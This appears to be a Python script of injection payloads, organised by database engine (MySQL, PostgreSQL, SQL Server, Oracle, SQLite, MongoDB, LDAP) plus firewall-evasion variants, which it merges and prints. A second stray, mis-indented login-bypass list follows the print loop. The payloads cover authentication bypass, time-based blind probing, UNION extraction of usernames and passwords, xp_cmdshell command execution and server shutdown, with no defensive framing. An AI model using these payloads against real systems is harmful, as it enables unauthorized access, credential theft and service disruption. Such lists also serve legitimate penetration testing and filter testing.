# ==================== UNIVERSAL (most DBs) ====================
universal = [
    "' OR 1=1--",
    "' OR '1'='1'--",
    "' OR 'a'='a'--",
    "' OR ''='",
    "' OR TRUE--",
    "' OR 1=1#",
    "\" OR 1=1--",
    "\" OR \"a\"=\"a",
    "admin'--",
    "admin'#",
    "' OR 1 LIKE 1--",
    "' OR 2 BETWEEN 1 AND 3--",
    "' OR 'x'='x'--",
    "' || '1'='1'--",
    "') OR 1=1--",
    "')) OR 1=1--",
    "') OR ('1'='1'--",
    "' OR 1=1-- -",
    "' OR NOT FALSE--",
    "' OR 2>1--",
    "admin' OR 1=1--",
    "admin' OR '1'='1'--",
    "1' OR 1=1--",
    "' OR 1=1/*",
    "or 1=1--",
    "' or 1=1 or ''='",
    "anything' OR 'x'='x",
    "x' OR 1=1 OR 'x'='y",
]

# ==================== MySQL SPECIFIC ====================
mysql = [
    "' OR 1=1#",
    "' OR 1=1-- -",
    "' OR TRUE#",
    "admin'#",
    "admin' #",
    "' OR 1=1 %23",
    "' OR SLEEP(5)#",
    "' OR BENCHMARK(10000000,SHA1('a'))--",
    "' OR IF(1=1,SLEEP(5),0)#",
    "' /*!50000OR*/ 1=1--",
    "' OR 1=1--+",
    "' OR 1=1;-- -",
    "'/**/OR/**/1=1#",
    "' UNION SELECT 1,'admin','password'#",
    "' OR MID(1,1,1)='1'#",
    "' OR ASCII(SUBSTRING('a',1,1))=97#",
    "' OR LENGTH('a')=1#",
    "' OR 1=1 LIMIT 1#",
    "' OR ISNULL(NULL)#",
    "' OR (SELECT 1 FROM dual)=1#",
    "' OR 0x50=0x50#",
    "' OR CHAR(49)=CHAR(49)#",
    "' GROUP BY password HAVING 1=1#",
    "' HAVING 1=1#",
    "admin' OR 1=1 LIMIT 1--+",
]

# ==================== PostgreSQL SPECIFIC ====================
postgresql = [
    "' OR 1=1--",
    "' OR TRUE--",
    "' OR 1=1::int--",
    "' OR pg_sleep(5)--",
    "' OR (SELECT 1)=1--",
    "' OR EXISTS(SELECT 1)--",
    "' OR CAST(1 AS BOOLEAN)--",
    "' OR 1=1;SELECT pg_sleep(5)--",
    "' UNION SELECT NULL,NULL--",
    "' OR LENGTH('a')=1--",
    "' OR CHR(49)=CHR(49)--",
    "' OR current_database() IS NOT NULL--",
    "' OR version() IS NOT NULL--",
    "'; SELECT version()--",
    "' OR 1::bool--",
]

# ==================== MSSQL (SQL Server) SPECIFIC ====================
mssql = [
    "' OR 1=1--",
    "' OR 1=1;--",
    "admin'--",
    "' OR WAITFOR DELAY '0:0:5'--",
    "'; EXEC xp_cmdshell('whoami')--",
    "' OR LEN('a')=1--",
    "' UNION SELECT NULL,NULL--",
    "' OR (SELECT COUNT(*) FROM sysobjects)>0--",
    "' HAVING 1=1--",
    "' GROUP BY password HAVING 1=1--",
    "' OR @@VERSION IS NOT NULL--",
    "' OR DB_NAME() IS NOT NULL--",
    "' OR SUSER_SNAME() IS NOT NULL--",
    "'; SHUTDOWN--",
    "' OR CHAR(49)=CHAR(49)--",
    "' OR IS_MEMBER('db_owner')=1--",
    "' OR HAS_DBACCESS('master')=1--",
    "'; WAITFOR DELAY '0:0:10'--",
]

# ==================== Oracle SPECIFIC ====================
oracle = [
    "' OR 1=1--",
    "' OR '1'='1'--",
    "' OR TRUE--",
    "' OR 1=1 FROM dual--",
    "' UNION SELECT NULL FROM dual--",
    "' UNION SELECT banner FROM v$version--",
    "' OR ROWNUM=1--",
    "' OR LENGTH('a')=1--",
    "' OR CHR(49)=CHR(49)--",
    "' OR (SELECT 1 FROM dual)=1--",
    "' OR UTL_INADDR.get_host_address('localhost') IS NOT NULL--",
    "' OR DBMS_PIPE.RECEIVE_MESSAGE('a',5)--",
    "' OR SYS_CONTEXT('USERENV','SESSION_USER') IS NOT NULL--",
    "' OR USER IS NOT NULL--",
    "' OR NVL(NULL,1)=1--",
]

# ==================== SQLite SPECIFIC ====================
sqlite = [
    "' OR 1=1--",
    "' OR '1'='1'--",
    "' OR TRUE--",
    "' OR 1=1;--",
    "' UNION SELECT NULL--",
    "' UNION SELECT sql FROM sqlite_master--",
    "' OR LENGTH('a')=1--",
    "' OR TYPEOF(1)='integer'--",
    "' OR UNICODE('a')=97--",
    "' OR RANDOM()>0--",
    "' OR sqlite_version() IS NOT NULL--",
    "' OR (SELECT COUNT(*) FROM sqlite_master)>=0--",
    "' OR NULLIF(1,2) IS NOT NULL--",
    "' OR INSTR('abc','a')=1--",
]

# ==================== NoSQL (MongoDB) SPECIFIC ====================
nosql_mongo = [
    "' || 1==1//",
    "' || 1==1%00",
    "admin' || '1'=='1",
    '{"$gt": ""}',
    '{"$ne": null}',
    '{"$ne": ""}',
    '{"$regex": ".*"}',
    '{"$exists": true}',
    '{"username": {"$gt": ""}, "password": {"$gt": ""}}',
    '{"username": {"$ne": ""}, "password": {"$ne": ""}}',
    '{"username": {"$regex": "admin"}, "password": {"$ne": ""}}',
    '{"$where": "return true"}',
    '{"$where": "this.password.match(/.*/i)"}',
    "true, $where: '1 == 1'",
    "'; return true; var a='",
    '{"username": {"$in": ["admin"]}, "password": {"$gt": ""}}',
]

# ==================== LDAP Injection ====================
ldap = [
    "*",
    "*)(&",
    "*)(|(&",
    "*(|(mail=*))",
    "*(|(objectclass=*))",
    "*)(uid=*))(|(uid=*",
    "admin)(&)",
    "admin)(|(password=*)",
    "*)((|uid=*",
    "admin)(!(&(1=0)))",
]

# ==================== WAF BYPASS / OBFUSCATION ====================
waf_bypass = [
    "'/**/OR/**/1=1--",
    "' %4FR 1=1--",
    "' %6FR 1=1--",
    "' oR 1=1--",
    "' Or 1=1--",
    "' /*!50000OR*/ 1=1--",
    "'%0aOR%0a1=1--",
    "'%0dOR%0d1=1--",
    "'%09OR%091=1--",
    "' OR%0b1=1--",
    "' OR/**_**/1=1--",
    "' /*!OR*/ 1=1--",
    "'\tOR\t1=1--",
    "' OR 1=1--+- ",
    "' OR 1=1;%00",
    "' OR 1=1 %00",
    "'-0-'",
    "' + 0 + '",
    "'-'",
    "'^'",
    "'&'",
    "' '",
    "'*'",
    "\\",
    "' OR 0b1=0b1--",
    "' OR 0x1=0x1--",
    "%27%20OR%201=1--",
    "%27%20OR%20%271%27=%271",
    "' uni%6Fn sel%65ct 1,2,3--",
    "' UNI/**/ON SEL/**/ECT 1,2,3--",
    "' /*!UNION*/ /*!SELECT*/ 1,2,3--",
    "' uNiOn sElEcT 1,2,3--",
    "' OR+'1'='1'--",
    "' OR-1=-1--",
]

# ==================== COMBINED MEGA LIST ====================
all_payloads = list(set(
    universal + mysql + postgresql + mssql +
    oracle + sqlite + nosql_mongo + ldap + waf_bypass
))

print(f"Total unique payloads: {len(all_payloads)}")
for i, p in enumerate(all_payloads, 1):
    print(f"{i}. {p}")




    payloads = [
    "' OR 1=1--",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR '1'='1'/*",
    "' OR 'a'='a'--",
    "' OR 'a'='a'#",
    "' OR ''='",
    "' OR 1=1--+",
    "' OR 1=1;--",
    "' OR TRUE--",
    "' OR TRUE#",
    "\" OR 1=1--",
    "\" OR 1=1#",
    "\" OR \"a\"=\"a",
    "\" OR \"\"=\"",
    "\" OR TRUE--",
    "admin'--",
    "admin'#",
    "admin'/*",
    "admin\"--",
    "admin\"#",
    "admin' OR 1=1--",
    "admin' OR 1=1#",
    "admin' OR '1'='1'--",
    "admin\" OR 1=1--",
    "admin') OR 1=1--",
    "admin\") OR 1=1--",
    "') OR 1=1--",
    "') OR ('1'='1'--",
    "\") OR 1=1--",
    "')) OR 1=1--",
    "' OR 1=1 LIMIT 1--",
    "' OR 1=1 LIMIT 1#",
    "' OR 1=1 ORDER BY 1--",
    "' UNION SELECT 1,'admin','password'--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT 'admin','admin'--",
    "' UNION SELECT username,password FROM users--",
    "1' OR 1=1--",
    "1' OR '1'='1'--",
    "1' OR 1=1#",
    "1\" OR 1=1--",
    "' OR 1=1--+- ",
    "' OR 1=1;%00",
    "' OR 1=1 %00",
    "admin' OR 1=1 LIMIT 1--+",
    "' OR 1=1 UNION ALL SELECT 1,2,3--",
    "'/**/OR/**/1=1--",
    "'/**/OR/**/'1'='1'--",
    "admin'/**/--",
    "' OR/**/ 1=1--",
    "' /*!50000OR*/ 1=1--",
    "' %6FR 1=1--",
    "' %4FR 1=1--",
    "' oR 1=1--",
    "' Or 1=1--",
    "' || 1=1--",
    "' || '1'='1'--",
    "' && 1=1--",
    "' | 1=1--",
    "' OR 1 LIKE 1--",
    "' OR 2 BETWEEN 1 AND 3--",
    "' OR 1 IN (1)--",
    "' OR 1=1-- -",
    "' OR 1=1;-- -",
    "'-'",
    "' '",
    "'&'",
    "'^'",
    "'*'",
    "'-0-'",
    "' + 0 + '",
    "' + '",
    "admin' AND 1=1--",
    "' OR NOT 0=0--",
    "' OR NOT FALSE--",
    "' OR 2>1--",
    "' OR 'x'='x'--",
    "' OR ISNULL(NULL)--",
    "' OR LEN('a')=1--",
    "' OR 1=1#-- -",
    "'; EXEC xp_cmdshell('whoami')--",
    "' OR SLEEP(5)--",
    "' OR BENCHMARK(10000000,SHA1('a'))--",
    "' OR pg_sleep(5)--",
    "' OR WAITFOR DELAY '0:0:5'--",
    "' OR IF(1=1,SLEEP(5),0)--",
    "' OR (SELECT 1)=1--",
    "' OR (SELECT COUNT(*) FROM users)>0--",
    "' OR EXISTS(SELECT 1)--",
    "' OR 1=1::int--",
    "\\",
    "' OR username IS NOT NULL--",
    "' HAVING 1=1--",
    "' GROUP BY password HAVING 1=1--",
    "' OR 1=1 %23",
    "' OR 0x50=0x50--",
    "' OR CHAR(49)=CHAR(49)--",
    "' OR 0b1=0b1--",
    "anything' OR 'x'='x",
    "x' OR 1=1 OR 'x'='y",
    "' OR 1 --",
    "or 1=1",
    "or 1=1--",
    "' or 1=1 or ''='",
    "\" or 1=1 or \"\"=\"",
    "' OR 'bug",
    "' OR 1=1 AND ''='",
    "admin' #",
    "admin')--",
    "') OR TRUE--",
    "') OR ('x')=('x",
    "' OR MID(1,1,1)='1'--",
    "' OR ASCII(SUBSTRING('a',1,1))=97--",
]